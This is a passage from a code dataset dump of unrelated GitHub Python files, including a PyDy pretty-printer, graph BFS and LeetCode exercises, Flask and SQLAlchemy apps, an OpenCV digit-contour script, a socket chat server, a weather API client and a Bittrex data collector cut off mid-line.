s[:-3]\n\n #def _print_Matrix(self, expr):\n # return expr._format_str(lambda elem: elem.__str__())\n\nclass PyDyPrettyPrinter(PrettyPrinter):\n def _print_UnitVector(self, e):\n class Fake(object):\n baseline = 0\n def render(self, *args, **kwargs):\n one = \"\\xe2\\x82\\x81\"\n two = \"\\xe2\\x82\\x82\"\n three = \"\\xe2\\x82\\x83\"\n bold = \"\\033[1m\"\n reset = \"\\033[0;0m\"\n s = str(e.v['sym'])\n name = s[:-1]\n index = s[-1]\n r = \"%s%s\" % (bold, name)\n if index == \"1\":\n r += one\n elif index == \"2\":\n r += two\n elif index == \"3\":\n r += three\n r += reset\n return r\n return Fake()\n\n def _print_Vector(self, e):\n class Fake(object):\n def render(self, *args, **kwargs):\n s = ''\n i = 0\n small_dot = \"\\xC2\\xB7\"\n if e.dict.keys() != []:\n uv_list = e.dict.keys()\n uv_list.sort(sort_UnitVector)\n for k in uv_list:\n # Case when the scalar coefficient is 1 or -1\n if (e.dict[k] == 1) or (e.dict[k] == -1):\n # First term don't print a leading + if positive\n if i == 0:\n if e.dict[k] == 1: sign = ''\n if e.dict[k] == -1: sign = '-'\n s += sign + ppuv(k)\n i += 1\n # All other terms put the sign and pad with spaces\n else:\n if e.dict[k] == 1: sign = '+'\n if e.dict[k] == -1: sign = '-'\n s += ' ' + sign + ' ' + ppuv(k)\n else:\n # First term\n if i == 0:\n # Put parenthesis around Add terms\n if isinstance(e.dict[k], Add):\n s += ('(' + pretty(e.dict[k]) +\n ')' + small_dot + ppuv(k))\n else:\n s += (pretty(e.dict[k]) +\n small_dot + ppuv(k))\n i += 1\n # All other terms pad with spaces and add parenthesis\n else:\n if isinstance(e.dict[k], Add):\n s += (' + (' + pretty(e.dict[k])\n + ')' + small_dot + ppuv(k))\n elif isinstance(e.dict[k], (Mul, Pow)):\n coef = (pretty(e.dict[k]) + small_dot +\n ppuv(k))\n if coef[0] == '-':\n s += ' - ' + coef[1:]\n else:\n s += ' + ' + coef\n else:\n s += (' + ' + pretty(e.dict[k]) + small_dot +\n ppuv(k))\n\n return s\n else:\n return \"\\033[1m\" + \"0\" + \"\\033[0;0m\"\n return Fake()\n\n def _print_Derivative(self, expr):\n return str(expr.args[0].func) + \"'\"*len(expr.args[1:])\n\n def _print_Mul(self, e):\n s = ''\n i = 0\n e_ts = trigsimp(expand(trigsimp(e)))\n if e_ts.is_Mul:\n N = len(e_ts.args)\n for a in e_ts.args:\n if i == 0:\n if a == -1:\n s += '-'\n else:\n s += self.doprint(a) + '\\xC2\\xB7'\n i += 1\n elif i < N-1:\n #if a.is_Pow and a.args[1]<0:\n # s += '\\b/' + self.doprint(a.args[0]) + '\\xC2\\xB7'\n #else:\n s += self.doprint(a) + '\\xC2\\xB7'\n i += 1\n else:\n s += self.doprint(a)\n return s\n else:\n return self.doprint(e_ts)\n\n def _print_sin(self, e):\n \"\"\"\n Print sin(qi(t)) as si, 
where i is any number.\n \"\"\"\n class Fake(object):\n def render(self, *args, **kwargs):\n if str(e.args[0].func)[0] == 'q':\n return u's' + unicode_subscript(str(e.args[0].func)[1:])\n else:\n return PrettyPrinter().doprint(e)\n return Fake()\n\n def _print_cos(self, e):\n \"\"\"\n Print cos(qi(t)) as si, where i is any number.\n \"\"\"\n class Fake(object):\n def render(self, *args, **kwargs):\n if str(e.args[0].func)[0] == 'q':\n return u'c' + unicode_subscript(str(e.args[0].func)[1:])\n else:\n return PrettyPrinter().doprint(e)\n return Fake()\n\n def _print_tan(self, e):\n \"\"\"\n Print tan(qi(t)) as si, where i is any number.\n \"\"\"\n class Fake(object):\n def render(self, *args, **kwargs):\n if str(e.args[0].func)[0] == 'q':\n return u't' + unicode_subscript(str(e.args[0].func)[1:])\n else:\n return PrettyPrinter().doprint(e)\n return Fake()\n\nfrom functions import (sort_UnitVector, gcs, cross, dt, dot, dummy_matrix,\n animate, generate_function)\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"hazelnusse/pydy","sub_path":"pydy/pydy.py","file_name":"pydy.py","file_ext":"py","file_size_in_byte":95062,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"16216125839","text":"\"\"\"\nCreated on : 3:16 PM\nAuthor : Xue Zhang\n\"\"\"\nfrom collections import deque, Counter\n\n\ndef construct_graph(graph_nodes, graph_from, graph_to):\n graph = {}\n for node in range(1, graph_nodes + 1):\n graph[node] = []\n for j in range(len(graph_from)):\n start = graph_from[j]\n end = graph_to[j]\n graph[start].append(end)\n graph[end].append(start)\n return graph\n\n\ndef bfs_graph(start, end, graph):\n q = deque()\n visited = []\n q.append((start, 0))\n while q:\n node, step = q.popleft()\n if node == end:\n return step\n neighbors = graph[node]\n for neighbor in neighbors:\n if neighbor not in visited:\n q.append((neighbor, step+1))\n visited.append(neighbor)\n return -1\n\n\ndef findShortest(graph_nodes, graph_from, graph_to, ids, val):\n d = Counter(ids)\n if d[val] < 2:\n return -1\n graph = construct_graph(graph_nodes, graph_from, graph_to)\n color_nodes = [k + 1 for k, v in enumerate(ids) if v == val]\n n = len(color_nodes)\n steps = []\n for j in range(n):\n for k in range(j+1, n):\n step = bfs_graph(color_nodes[j], color_nodes[k], graph)\n if step != -1:\n steps.append(step)\n return min(steps) if steps else -1\n\n\nif __name__ == '__main__':\n nodes, edges = map(int, input().split())\n\n graph_start = [0] * edges\n\n graph_end = [0] * edges\n\n for i in range(edges):\n graph_start[i], graph_end[i] = map(int, input().split())\n\n colors = list(map(int, input().rstrip().split()))\n\n col = int(input())\n\n ans = findShortest(nodes, graph_start, graph_end, colors, col)\n\n print(ans)","repo_name":"xiaoxue11/hank_practice","sub_path":"Graph/02_findShortest.py","file_name":"02_findShortest.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38241724850","text":"import os\nfrom pathlib import Path\nimport random\nfrom typing import Tuple\nfrom random import randint\n\nimport sys\n\nimport unix_fonts\n\nfrom PIL import (\n Image,\n ImageDraw,\n ImageFont,\n)\n\nOUTPUT_PATH = \"output/\"\nBACKGROUND = (24, 24, 24)\nSIZE = (400, 400)\nCENTER = (SIZE[0] / 2, SIZE[1] / 2)\nMIN_AVOIDANCE = 32\n\nitems = sys.argv[1:]\n\n\ndef get_center(a: Tuple[int, int], b: Tuple[int, int]) -> Tuple[int, int]:\n return 
((b[0] - a[0]) / 2 + a[0], (b[1] - a[1]) / 2 + a[1])\n\n\ndef gray(color: Tuple[int, int, int]) -> int:\n return (color[0] + color[1] + color[2]) / 3\n\n\ndef get_random_color(avoid: Tuple[int, int, int]) -> Tuple[int, int, int]:\n while True:\n col = (randint(0, 255), randint(0, 255), randint(0, 255))\n if gray(col) >= MIN_AVOIDANCE:\n return col\n\n\nif not os.path.isdir(OUTPUT_PATH):\n os.mkdir(OUTPUT_PATH)\n\n\nfor i in range(10):\n with Image.new(\"RGB\", SIZE) as image:\n image.paste(BACKGROUND, (0, 0, SIZE[0], SIZE[1]))\n\n draw = ImageDraw.Draw(image, \"RGB\")\n\n for item in items:\n font = ImageFont.truetype(\n unix_fonts.get_random_font(), random.randint(16, 32)\n )\n pos = (randint(0, SIZE[0]), randint(0, SIZE[1]))\n draw.text(\n pos, item, get_random_color(BACKGROUND), align=\"center\", font=font\n )\n\n image.save(os.path.join(OUTPUT_PATH, \"image_%d.png\" % i))\n","repo_name":"juliohq/ankify","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35676196468","text":"from flask import Flask, g\nfrom flask_mail import Mail\n\nfrom urllib.parse import urlparse\nfrom redis import Redis\nfrom redis.sentinel import Sentinel\n\napp = Flask(__name__)\nimport websmash.default_settings\napp.config.from_object(websmash.default_settings)\napp.config.from_envvar('WEBSMASH_CONFIG', silent=True)\nmail = Mail(app)\n\n\ndef get_db():\n redis_store = getattr(g, '_database', None)\n if redis_store is None:\n if 'FAKE_DB' in app.config and app.config['FAKE_DB']:\n from mockredis import mock_redis_client\n redis_store = g._database = mock_redis_client(encoding='utf-8', decode_responses=True)\n else:\n if app.config['REDIS_URL'].startswith('redis://'):\n redis_store = g._database = Redis.from_url(app.config['REDIS_URL'], encoding='utf-8',\n decode_responses=True)\n elif app.config['REDIS_URL'].startswith('sentinel://'):\n parsed_url = urlparse(app.config['REDIS_URL'])\n service = parsed_url.path.lstrip('/')\n port = 26379\n if ':' in parsed_url.netloc:\n host, str_port = parsed_url.netloc.split(':')\n port = int(str_port)\n else:\n host = parsed_url.netloc\n sentinel = Sentinel([(host, port)], socket_timeout=0.1)\n redis_store = sentinel.master_for(service, redis_class=Redis, socket_timeout=0.1)\n return redis_store\n\nimport websmash.api\nimport websmash.error_handlers\n","repo_name":"kblin/websmash","sub_path":"websmash/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"43192145304","text":"import socket\nimport threading\nimport json\n\nHOST = '127.0.0.1'\nPORT = 12345\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((HOST, PORT))\nserver.listen()\n\nclients = []\nnames = []\nkeys = []\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n if b'disconnect' in message:\n # go to except\n assert 1 != 1\n \n elif message != b'':\n print(json.dumps({'received': message.decode()}))\n broadcast(message)\n\n except:\n index = clients.index(client)\n clients.remove(client)\n client.close()\n\n name = names[index]\n names.remove(name)\n break\n\ndef run():\n while len(clients) < 2:\n client, address = server.accept()\n clients.append(client)\n\n # asking for nickname\n client.send('> Enter your name: '.encode())\n name 
= client.recv(1024).strip().decode()\n names.append(name)\n\n print(json.dumps({'Address': str(address), 'Name':name, 'status':'Connected'}))\n\n # asking for pubKey\n client.send('> Enter your pubKey (\"Px, Py\"): '.encode())\n pubKey = client.recv(1024).strip().decode()\n keys.append(pubKey)\n\n print(json.dumps({'Address': str(address), 'Name':name, 'pubKey':pubKey}))\n\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n \n clients[0].send(f\"{names[1]}'s pubKey: {keys[1]}\".encode())\n clients[1].send(f\"{names[0]}'s pubKey: {keys[0]}\".encode())\n\nif __name__ == '__main__':\n print(f'[!] Listenning to port {PORT}...')\n run()\n","repo_name":"idk-wh0am1/Secure-Chat-Room","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71890557633","text":"\"\"\"\nProvides database functionality and integration with SQLAlchemy.\n\"\"\"\n\nfrom app.extensions import db\n\n\nclass BatteryData(db.Model):\n \"\"\"\n Model representing the 'battery_data' table.\n This is the main table. The main parameters are stored here\n\n Attributes:\n id (int): The primary key of the table.\n barcode (int): The unique barcode of the battery.\n stock_params_id (int): Foreign key referencing the 'stock_parameters' table.\n real_params_id (int): Foreign key referencing the 'real_parameters' table.\n source_id (int): Foreign key referencing the 'source' table.\n photo_id (int): Foreign key referencing the 'photo' table.\n timestamp (DateTime): The timestamp of the battery data.\n \"\"\"\n\n __tablename__ = 'battery_data'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n barcode = db.Column(db.Integer, unique=True, nullable=False)\n stock_params_id = db.Column(db.ForeignKey('stock_parameters.id'))\n real_params_id = db.Column(db.ForeignKey('real_parameters.id'))\n source_id = db.Column(db.Integer, db.ForeignKey('source.id'))\n photo_id = db.Column(db.Integer, db.ForeignKey('photo.id'))\n datetime = db.Column(db.DateTime)\n\n stock_params = db.relationship('StockParameters', backref='battery_data')\n real_params = db.relationship('RealParameters', backref='battery_data')\n source = db.relationship('Source', backref='battery_data')\n photo = db.relationship('Photo', backref='battery_data')\n\n\nclass StockParameters(db.Model):\n \"\"\"\n Model representing the 'stock_parameters' table.\n Here are the stock batteries parameters\n\n Attributes:\n id (int): The primary key of the table.\n name_id (int): Foreign key referencing the 'name' table.\n capacity_id (int): Foreign key referencing the 'capacity' table.\n resistance_id (int): Foreign key referencing the 'resistance' table.\n charge_current_id (int): Foreign key referencing the 'current' table.\n max_charge_current_id (int): Foreign key referencing the 'current' table.\n discharge_current_id (int): Foreign key referencing the 'current' table.\n max_discharge_current_id (int): Foreign key referencing the 'current' table.\n \"\"\"\n\n __tablename__ = 'stock_parameters'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n name_id = db.Column(db.Integer, db.ForeignKey('name.id'))\n capacity_id = db.Column(db. Integer, db.ForeignKey('capacity.id'))\n resistance_id = db.Column(db.Integer, db.ForeignKey('resistance.id'))\n charge_current_id = db.Column(db.Integer, db.ForeignKey('current.id'))\n max_charge_current_id = db.Column(db. 
Integer, db.ForeignKey('current.id'))\n    discharge_current_id = db.Column(db.Integer, db.ForeignKey('current.id'))\n    max_discharge_current_id = db.Column(db.Integer, db.ForeignKey('current.id'))\n\n\nclass RealParameters(db.Model):\n    \"\"\"\n    Model representing the 'real_parameters' table.\n    This is a table model where the actual battery parameters are stored\n\n    Attributes:\n        id (int): The primary key of the table.\n        name_id (int): Foreign key referencing the 'name' table.\n        color_id (int): Foreign key referencing the 'color' table.\n        capacity_id (int): Foreign key referencing the 'capacity' table.\n        resistance_id (int): Foreign key referencing the 'resistance' table.\n        voltage_id (int): Foreign key referencing the 'voltage' table.\n        weight_id (int): Foreign key referencing the 'weight' table.\n    \"\"\"\n\n    __tablename__ = 'real_parameters'\n    id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n    name_id = db.Column(db.Integer, db.ForeignKey('name.id'))\n    color_id = db.Column(db.Integer, db.ForeignKey('color.id'), nullable=False)\n    capacity_id = db.Column(db.Integer, db.ForeignKey('capacity.id'))\n    resistance_id = db.Column(db.Integer, db.ForeignKey('resistance.id'), nullable=False)\n    voltage_id = db.Column(db.Integer, db.ForeignKey('voltage.id'), nullable=False)\n    weight_id = db.Column(db.Integer, db.ForeignKey('weight.id'))\n\n    name = db.relationship('Name', backref='real_parameters')\n    color = db.relationship('Color', backref='real_parameters')\n    capacity = db.relationship('Capacity', backref='real_parameters')\n    resistance = db.relationship('Resistance', backref='real_parameters')\n    voltage = db.relationship('Voltage', backref='real_parameters')\n    weight = db.relationship('Weight', backref='real_parameters')\n","repo_name":"RuslanZaliznyak/BatteryHubAPI","sub_path":"models/records.py","file_name":"records.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"24674413884","text":"from ReliableCommunication import Server\n\nmyServer = Server(address=\"0.0.0.0\", port=12345, messageDataType=\"string\")\n\ndef broadcast(message):\n    ''' server's callback '''\n    myServer.broadcast(message)\n    print(\"{}\".format(message))\n\ndef onConnection(client):\n    print(\"{}:{} Connected\".format(client.address, client.port))\n\ndef onDisconnection(client):\n    print(\"{}:{} Disconnected\".format(client.address, client.port))\n\n\nmyServer.add_onmessage_callback(broadcast)\nmyServer.add_onconnect_callback(onConnection)\nmyServer.add_onclose_callback(onDisconnection)\nmyServer.start()\n\ninput(\"\\tPRESS ANY KEY TO EXIT\\n\")\nmyServer.stop()","repo_name":"WeibelLab/Comms","sub_path":"python/Example_Server.py","file_name":"Example_Server.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"34627263312","text":"import numpy as np\nimport cv2\nimport basicF as bf\n\npath = \"./img/XKw9NI.png\"\n\nimage = cv2.imread(path)\n\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\nblured = cv2.bilateralFilter(gray, 6 , 220, 220)\ncv2.imshow(\"image\", image)\n# cv2.imshow(\"gray\", gray)\ncv2.imshow(\"blured\", blured)\ncv2.waitKey(0)\n \nedged = cv2.Canny(blured, 150, 180) \ncv2.imshow(\"edged\", edged) \ncv2.waitKey(0) \n \n# Find Contours\ncontours, _ = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n \n#Sort out contours left to right by using their x 
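# --- Editor's note: illustrative sketch, not part of the original dataset record.
# Typical use of the Flask-SQLAlchemy models above: create a battery row
# together with its stock-parameter row, then look it up by its unique
# barcode. The `db` session handle and the call sites are assumptions;
# column and relationship names follow the record itself.

from datetime import datetime as dt

def save_battery(db, BatteryData, StockParameters, barcode):
    battery = BatteryData(barcode=barcode, datetime=dt.utcnow())
    battery.stock_params = StockParameters()  # populates stock_params_id on flush
    db.session.add(battery)
    db.session.commit()
    return battery

def find_battery(db, BatteryData, barcode):
    # The barcode column is declared unique, so at most one row matches.
    return db.session.query(BatteryData).filter_by(barcode=barcode).one_or_none()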
coordinates\nprint(len(contours)) \n\nfiltered_contours = [c for c in contours if cv2.contourArea(c) > 2 ]\ncontours = sorted(filtered_contours, key = bf.x_cord_contour, reverse = False)\n# Create empty array to store entire number\nfull_number = []\n \n\nprint(len(contours))\n# loop over the contours\nfor c in contours:\n    # compute the bounding box for the rectangle\n    (x, y, w, h) = cv2.boundingRect(c)    \n    \n    if (h > 10):\n        roi = edged[y:y + h, x:x + w]\n        ret, roi = cv2.threshold(roi, 127, 255,cv2.THRESH_BINARY_INV)\n        squared = bf.makeSquare(roi)\n        final = bf.resize_to_pixel(20, squared)\n        cv2.imshow(\"final\", final)\n\n        # final_array = final.reshape((1,400))\n        # final_array = final_array.astype(np.float32)\n        # ret, result, neighbours, dist = knn.findNearest(final_array, k=1)\n        # number = str(int(float(result[0])))\n        #full_number.append(number)\n        # draw a rectangle around the digit, then show what the\n        # digit was classified as\n\n        test = image[y:y+h, x:x+w]\n        cv2.imshow(\"test\", test)\n\n        cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)\n        #cv2.putText(image, number, (x , y + 155),\n        #    cv2.FONT_HERSHEY_COMPLEX, 2, (255, 0, 0), 2)\n        cv2.imshow(\"image\", image)\n        cv2.waitKey(0) \n    \ncv2.destroyAllWindows()\n\n","repo_name":"rootsj/macro","sub_path":"stringsplit.py","file_name":"stringsplit.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"17380979231","text":"\"\"\"\nGiven an array of strings, group anagrams together.\n\nFor example, given: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"], \nReturn:\n\n[\n  [\"ate\", \"eat\",\"tea\"],\n  [\"nat\",\"tan\"],\n  [\"bat\"]\n]\nNote: All inputs will be in lower-case.\n\"\"\"\n\n\"\"\"Solution\n\"\"\"\n\nclass Solution(object):\n    def groupAnagrams(self, strs):\n        \"\"\"\n        :type strs: List[str]\n        :rtype: List[List[str]]\n        \"\"\"\n        diction = {}\n        for string in strs:\n            key = ''.join(sorted(string))\n            if key not in diction:\n                diction[key] = [string]\n            else:\n                diction[key].append(string)\n        ret = []\n        for key in diction.keys():\n            ret.append(diction[key])\n        return ret\n","repo_name":"bwang8482/LeetCode","sub_path":"Bloomberg/49_Group_Anagrams.py","file_name":"49_Group_Anagrams.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"15655785513","text":"from collections import deque\n\ndef check_cup_value(cups):\n    if cups[0] <= 0:\n        cups.popleft()\n    return cups\n\ndef fill_cups(cups, bottles, wasted_water):\n    check_cup_value(cups)\n    if bottles[-1] < cups[0]:\n        cups[0] -= bottles[-1]\n        bottles.pop()\n    else:\n        wasted_water += bottles[-1] - cups[0]\n        cups.popleft()\n        bottles.pop()\n    return wasted_water\n\ndef print_result(cups, bottles, wasted_water):\n    if cups:\n        print(f\"Cups: {' '.join(str(el) for el in cups)}\")\n    else:\n        print(f\"Bottles: {' '.join([str(el) for el in reversed(bottles)])}\")\n    print(f\"Wasted litters of water: {wasted_water}\")\n\ncups = deque([int(el) for el in input().split()])\nbottles = [int(el) for el in input().split()]\nwasted_water = 0\n\nwhile True:\n    if not bottles or not cups:\n        break\n    wasted_water = fill_cups(cups, bottles, wasted_water)\n\nprint_result(cups, bottles, wasted_water)","repo_name":"geodimitrov/Python-Advanced-SoftUni","sub_path":"Stacks-Queues/Exercises/10. cups_and_bottles.py","file_name":"10. 
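# --- Editor's note: illustrative sketch, not part of the original dataset record.
# The group-anagrams record above builds its buckets by hand; the idiomatic
# variant uses collections.defaultdict with the sorted word as the key.
# Runtime is O(n * k log k) for n words of length k.

from collections import defaultdict

def group_anagrams(strs):
    buckets = defaultdict(list)
    for word in strs:
        buckets[''.join(sorted(word))].append(word)
    return list(buckets.values())

assert sorted(map(sorted, group_anagrams(["eat", "tea", "tan", "ate", "nat", "bat"]))) == \
       sorted(map(sorted, [["eat", "tea", "ate"], ["tan", "nat"], ["bat"]]))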
cups_and_bottles.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31088853455","text":"from flask import Flask, render_template, request\nimport json\nimport sqlite3\nimport sys\nsys.path.append('/home/niko/Dev/Food/core')\n\nfrom Dinner import Dinner\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template(\"home.html\")\n\n\n@app.route('/getDinner', methods=['GET'])\ndef getDinner():\n connection = sqlite3.connect(\"lite.db\")\n dinner = Dinner(connection)\n item = dinner.getRandom()\n return json.dumps({'status': 'OK', 'data': {'item': item}})\n\n\n@app.route('/addDinner', methods=['POST'])\ndef addDinner():\n connection = sqlite3.connect(\"lite.db\")\n dinner = Dinner(connection)\n dinner.insert(request.form.get(\"newDinner\"))\n return json.dumps({'status': 'OK', 'data': request.form.get(\"newDinner\")})\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"nikoliukka/food","sub_path":"ui/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11517438409","text":"class Solution(object):\n def minPathSum(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if not grid:\n return 0\n for row in range(len(grid) - 1):\n grid[row+1][0] += grid[row][0]\n for col in range(len(grid[0]) - 1):\n grid[0][col+1] += grid[0][col]\n for row in range(1, len(grid)):\n for col in range(1, len(grid[0])):\n grid[row][col] += min(grid[row][col - 1], grid[row - 1][col])\n return grid[-1][-1]\n","repo_name":"jackyhobingo/LeetCode","sub_path":"64.Minimum_Path_Sum.py","file_name":"64.Minimum_Path_Sum.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72008097793","text":"import datetime\nimport os\nimport statistics\n\nimport requests\n\n\nWEATHER_API_KEY = os.environ['WEATHER_API_KEY']\nBASE_WEATHER_API_URL = os.environ['BASE_WEATHER_API_URL']\n\ndef extract_hourly_temps(day):\n \"\"\"\n Extract hourly temps for the day and return as list.\n \"\"\"\n temps = []\n for hour in day['hour']:\n temps.append(hour['temp_c'])\n return temps\n\ndef fetch_city_weather(city, days):\n \"\"\"\n Fetch city weather data from weatherapi.com\n \"\"\"\n end_date = datetime.datetime.now().date()\n start_date = end_date - datetime.timedelta(days=days)\n\n params = {\n 'dt': start_date,\n 'end_dt': end_date,\n 'q': city,\n 'key': WEATHER_API_KEY\n }\n return requests.get(BASE_WEATHER_API_URL, params=params)\n\ndef calculate_temps(city, days=0):\n \"\"\"\n Calculates maximum, minimum, average and medium temps from hourly data\n collected over a range of `days`.\n \"\"\"\n response = fetch_city_weather(city, days)\n if response.status_code != 200:\n return response.json(), response.status_code\n json_resp = response.json()\n forecast_day = json_resp['forecast']['forecastday']\n all_hourly_temps = []\n for day in forecast_day:\n temps = extract_hourly_temps(day)\n all_hourly_temps.extend(temps)\n maximum = max(all_hourly_temps)\n minimum = min(all_hourly_temps)\n average = statistics.mean(all_hourly_temps)\n median = statistics.median(all_hourly_temps)\n return {\n 'maximum': maximum,\n 'minimum': minimum,\n 'average': average,\n 'median': median\n }, 
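# --- Editor's note: illustrative sketch, not part of the original dataset record.
# The minimum-path-sum record above mutates the grid in place; this standalone
# version exercises the same recurrence grid[r][c] += min(left, up) on the
# classic 3x3 example, where the cheapest route 1->3->1->1->1 costs 7.

def min_path_sum(grid):
    for r in range(len(grid) - 1):
        grid[r + 1][0] += grid[r][0]
    for c in range(len(grid[0]) - 1):
        grid[0][c + 1] += grid[0][c]
    for r in range(1, len(grid)):
        for c in range(1, len(grid[0])):
            grid[r][c] += min(grid[r][c - 1], grid[r - 1][c])
    return grid[-1][-1]

assert min_path_sum([[1, 3, 1], [1, 5, 1], [4, 2, 1]]) == 7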
response.status_code\n","repo_name":"sitati-elsis/weather-api","sub_path":"api/services/weatherapi.py","file_name":"weatherapi.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22937144641","text":"\"Definition of devices.\"\n\nfrom abc import ABC, abstractmethod\n\nfrom comm import Topic\nfrom enums import DeviceKind, DeviceModel, Vendor\n\nTOPIC_BASE = \"zigbee2mqtt\"\n\n\nclass Addressable(ABC):\n \"Marks an entity as addressable.\"\n\n def __init__(self):\n pass\n\n @property\n @abstractmethod\n def topic(self) -> Topic:\n \"Returns the topic to address this entity\"\n\n\nclass Device(Addressable, ABC):\n \"Represents a generic device\"\n\n def __init__(\n self,\n name: str,\n room: str,\n model: DeviceModel,\n ident: str,\n icon: str,\n ):\n self.name = name\n self.room = room\n self.model = model\n self.ident = ident\n self.icon = icon\n self._topic = Topic.for_device(\n name=self.name,\n kind=self.model.kind,\n room=self.room,\n groups=[]\n )\n\n @property\n def vendor(self) -> Vendor:\n \"Specifies the vendor of the device, Ikea or Hue.\"\n return self.model.vendor\n\n @property\n def kind(self) -> DeviceKind:\n \"Specifies the physical kind of the device.\"\n return self.model.kind\n\n @property\n def topic(self) -> Topic:\n return self._topic\n\n def set_topic(self) -> str:\n \"Creates a set-topic for the device\"\n return self.topic.as_set()\n\n def get_topic(self) -> str:\n \"Creates a set-topic for the device\"\n return self.topic.as_get()\n","repo_name":"Schwenger/PiPyHomeBridge","sub_path":"homebase/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36037759365","text":"import sqlite3\nimport time\nimport os.path\nimport requests\n\n\nclass bittrexStream(object):\n def __init__(self, baseCurrency = 'BTC', db='bittrex.db', url = 'https://bittrex.com/api/v1.1/public/getmarketsummaries'):\n '''\n Get % change from Bittrex\n '''\n self.url = url\n print(self.url)\n\n self.base = baseCurrency\n data = requests.get(self.url).json()\n self.pairs = []\n self.pairlist = []\n self.insert_price = None\n self.insert_volume = None\n self.insert_ask = None\n self.insert_bid = None\n\n # fill up the pairs to stream, according to base currency\n for p in range(len(data['result'])):\n thispair = data['result'][p]['MarketName']\n if thispair[0:3] == self.base:\n # this replacement has to be done for the sqlite database...\n self.pairlist.append(thispair)\n thispair = thispair.replace('-','_')\n print(thispair)\n self.pairs.append(thispair)\n\n self.pair_vector = self.pairs[0] + ' REAL'\n for p in range(1,len(self.pairs)):\n self.pair_vector += ', '+ self.pairs[p] + ' REAL'\n\n self.col_vector=self.pairs[0]\n for p in range(1,len(self.pairs)):\n self.col_vector += ', '+ self.pairs[p]\n\n self.col_vector = 'UNIX_Time, ' + self.col_vector\n self.columns = 'UNIX_Time, ' + self.pair_vector\n\n self.path = db\n\n # checks if the table in the database is already existing, otherwise creates a table\n if (os.path.exists(self.path)):\n print('Open table')\n conn = sqlite3.connect(self.path)\n c = conn.cursor()\n price_string = 'CREATE TABLE IF NOT EXISTS BTC_PAIRS_PRICE (UNIX_Time INT, ' + self.pair_vector + ')'\n volume_string = 'CREATE TABLE IF NOT EXISTS BTC_PAIRS_VOLUME (UNIX_Time INT, ' + self.pair_vector + ')'\n ask_string = 'CREATE TABLE IF NOT EXISTS 
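# --- Editor's note: illustrative sketch, not part of the original dataset record.
# The weather helper above reads its two environment variables at import time,
# so they must exist before the module is imported. The key below is a
# placeholder, and the history-endpoint URL is an assumption about the
# weatherapi.com service, not taken from the source.

import os

os.environ.setdefault('WEATHER_API_KEY', '<your-key>')  # placeholder value
os.environ.setdefault('BASE_WEATHER_API_URL',
                      'https://api.weatherapi.com/v1/history.json')

# from api.services import weatherapi   # import *after* the env vars are set
# stats, status = weatherapi.calculate_temps('London', days=3)
# if status == 200:
#     print(stats['maximum'], stats['minimum'], stats['average'], stats['median'])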
